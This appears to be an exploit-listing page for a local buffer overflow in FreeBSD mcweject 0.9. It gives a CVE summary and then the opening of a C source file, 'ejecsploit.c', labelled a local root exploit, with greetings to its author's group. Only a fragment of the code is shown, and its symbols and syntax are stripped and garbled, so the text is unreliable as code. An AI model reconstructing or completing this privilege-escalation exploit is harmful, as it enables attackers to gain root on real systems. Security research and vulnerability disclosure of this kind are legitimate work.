mcweject -- exploitable buffer overflow

CVE reports: Buffer overflow in eject.c in Jason W. Bacon mcweject 0.9 on FreeBSD, and possibly other versions, allows local users to execute arbitrary code via a long command line argument, possibly involving the device name...

FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation

// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin you 31337!!! ; // thanks to sacrine and all the other netric guys!!! you rule : include include include include define LEN 1264 define NOP 0x90 extern char environ; int main char bufLEN; char ptr; char arg4;...